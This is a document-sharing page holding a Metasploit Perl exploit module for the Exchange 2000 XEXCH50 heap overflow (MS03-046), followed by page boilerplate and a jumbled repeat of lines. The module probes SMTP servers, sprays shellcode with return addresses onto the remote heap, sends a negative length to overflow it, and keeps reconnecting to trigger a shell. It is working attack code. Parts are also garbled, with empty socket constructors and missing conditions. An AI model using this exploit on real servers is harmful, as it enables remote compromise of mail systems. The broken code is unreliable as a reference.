Exchange2000 Xexch50

##
# This file is part of the Metasploit Framework and may be redistributed

# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::exchange2000_xexch50;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Exchange 2000 MS03-46 Heap Overflow',
'Version' => '$Revision: 1.35 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Arch' => [ 'x86' ],

'OS' => [ 'win32', 'win2000' ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 25],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' => {
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x20:=+\x22",
},
'Description' => Pex::Text::Freeform(qq{

This is an exploit for the Exchange 2000 heap overflow. Due
to the nature of the vulnerability, this exploit is not very
reliable. This module has been tested against Exchange 2000
SP0 and SP3 running a Windows 2000 system patched to SP4. It
normally takes between one and ten tries to successfully
obtain a shell. This exploit is *very* unreliable, we hope
to provide a much more solid one in the near future.
}),
'Refs' =>
[
['OSVDB', '2674'],
['MSB', 'MS03-046'],
['MIL', '20'],
],
'DefaultTarget' => 0,
'Targets' => [['Exchange 2000', 0x0c900c90, 3000, 11000, 512]],
'Keys' => ['exchange2000'],

'DisclosureDate' => 'Oct 15 2003',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced},
@_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
my $res = $s->Recv(-1, 20);

if ($res !~ /Microsoft/) {
$s->Close();
$self->PrintLine("[*] Target does not appear to be an exchange
server");
return $self->CheckCode('Safe');
}
$s->Send("EHLO X\r\n");
$res = $s->Recv(-1, 3);
if ($res !~ /XEXCH50/) {
$s->Close();
$self->PrintLine("[*] Target does not appear to be an exchange
server");
}
$s->Send("MAIL FROM: metasploit\r\n");

$res = $s->Recv(-1, 3);
$s->Send("RCPT TO: administrator\r\n");

$res = $s->Recv(-1, 3);
$s->Send("XEXCH50 2 2\r\n");
$res = $s->Recv(-1, 3);
$s->Close();
if ($res !~ /Send binary/) {

$self->PrintLine("[*] Target has been patched");
}
$self->PrintLine("[*] Target appears to be vulnerable");

return $self->CheckCode('Appears');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode =$self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my ($tname, $retaddr) = @{$target};
my $buff_len = $target->[2];
$self->PrintLine(sprintf("[*] Trying '$tname' using return address 0x%.8x

[$buff_len]", $retaddr));
my $counter = 1;
my @seencount = ();
while (1) {
if(! $seencount[$counter]) {
$self->PrintLine("[*] Exploit attempt #$counter");
$seencount[$counter]++;
}
$self->Print("[*] Connection 1: ");

my $s = Msf::Socket::Tcp->new
(
);
if ($s->IsError) {
$self->PrintLine('Error');
sleep(5);
next;
}
my $res = $s->Recv(-1, 3);

if (! $res) {
$self->PrintLine("Error");
next;
}
if ($res !~ /Microsoft/) {
$s->Close();
$self->PrintLine("[*] Target does not appear to be running
Exchange: $res");
return;
}
$self->Print("EHLO ");
$s->Send("EHLO X\r\n");
$res = $s->Recv(-1, 3);
if (! $res) { $self->PrintLine("Error"); next; }
$self->PrintLine("[*] Target is not running Exchange: $res");
return;
}
$self->Print("MAIL ");
$s->Send("MAIL FROM: metasploit\r\n");
$res = $s->Recv(-1, 3);
$self->Print("RCPT ");
$s->Send("RCPT TO: administrator\r\n");
$res = $s->Recv(-1, 3);
# verify that the server is not patched

$s->Send("XEXCH50 2 2\r\n");
$res = $s->Recv(-1, 3);
$self->Print("XEXCH50 ");
if ($res !~ /Send binary/) {
$s->Close();
$self->PrintLine("[*] Target is not vulnerable");
return;
}
$s->Send("XX");
$res = $s->Recv(-1, 3);
$self->Print("ALLOC ");
# allocate heap memory

my $dsize = (1024 * 1024 * 32);
$s->Send("XEXCH50 $dsize 2\r\n");
$res = $s->Recv(-1, 3);
$self->PrintLine("OK");
my $payload = ((
(pack("V", $retaddr) x (256 * 1024)).
$shellcode . ("X" x 1024)
) x 4
). ("BEEF");
$self->Print("[*] Uploading shellcode to remote heap: ");

$s->Send($payload);
$self->Print("[*] Connection 2: ");

my $x = Msf::Socket::Tcp->new
(
);
if ($x->IsError) {
$self->PrintLine('Error');
next;
}
$res = $x->Recv(-1, 3);

if (! $res) {
$self->PrintLine("[*] No response");
next;
}
$self->Print("EHLO ");
$x->Send("EHLO X\r\n");
$res = $x->Recv(-1, 3);
$self->PrintLine("[*] Target is not running Exchange: $res");
return;
}
$self->Print("MAIL ");
$x->Send("MAIL FROM: metasploit\r\n");
$res = $x->Recv(-1, 3);
$self->Print("RCPT ");
$x->Send("RCPT TO: administrator\r\n");
$res = $x->Recv(-1, 3);
$self->Print("XEXCH50 ");
# allocate a negative value

$x->Send("XEXCH50 -1 2\r\n");
$res = $x->Recv(-1, 3);
if (! $res) {
$self->PrintLine("[*] No response");
next;
}
$buff_len += $target->[4];
if ($buff_len > $target->[3]) { $buff_len = $target->[2] }
# send the massive buffer of our return address

my $heapover = pack("V", $retaddr) x ($buff_len);
$self->PrintLine("[*] Overwriting heap with payload jump

($buff_len)...");
$x->Send($heapover);
# reconnect until the service stops responding
my $count = 0;
$self->Print("[*] Starting reconnect sequences: ");
while ($count < 10) {

my $tmp = Msf::Socket::Tcp->new
(
);
if ($tmp->IsError) {
last;
}
$tmp->Send("HELO X\r\n");
$tmp->Close();
$count++;
}
$self->PrintLine(" OK");
$self->PrintLine("");
$counter++;
}
return;
}

Exchange2000 Xexch50

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Exchange2000 Xexch50

Uploaded by

Copyright:

Available Formats

##

# This file is part of the Metasploit Framework and may be redistributed

'Arch' => [ 'x86' ],

'Description' => Pex::Text::Freeform(qq{

'Keys' => ['exchange2000'],

my $res = $s->Recv(-1, 20);

$s->Send("MAIL FROM: metasploit\r\n");

$s->Send("RCPT TO: administrator\r\n");

if ($res !~ /Send binary/) {

$self->PrintLine("[*] Target appears to be vulnerable");

$self->PrintLine(sprintf("[*] Trying '$tname' using return address 0x%.8x

$self->Print("[*] Connection 1: ");

my $res = $s->Recv(-1, 3);

# verify that the server is not patched

# allocate heap memory

$self->Print("[*] Uploading shellcode to remote heap: ");

$self->Print("[*] Connection 2: ");

$res = $x->Recv(-1, 3);

# allocate a negative value

# send the massive buffer of our return address

$self->PrintLine("[*] Overwriting heap with payload jump

while ($count < 10) {

You might also like